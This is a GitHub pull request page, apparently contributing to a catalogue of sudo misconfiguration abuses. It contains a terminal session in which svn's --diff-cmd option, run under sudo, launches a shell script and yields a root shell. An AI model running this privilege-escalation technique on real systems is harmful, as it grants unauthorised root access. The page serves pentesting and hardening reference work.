Skip to content

Conversation

Frissi0n
Copy link

lowpriv@7dc99421ba84:/tmp/working$         TD=$(mktemp -d)
        svnadmin create $TD/pwn
        svn checkout file:///$TD/pwn $TD/project
        echo -e '#!/bin/bash\n/bin/sh' > $TD/shell
        chmod +x $TD/shell
        sudo svn diff --diff-cmd "$TD/shell"
Checked out revision 0.
Index: c
===================================================================
# id
uid=0(root) gid=0(root) groups=0(root)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant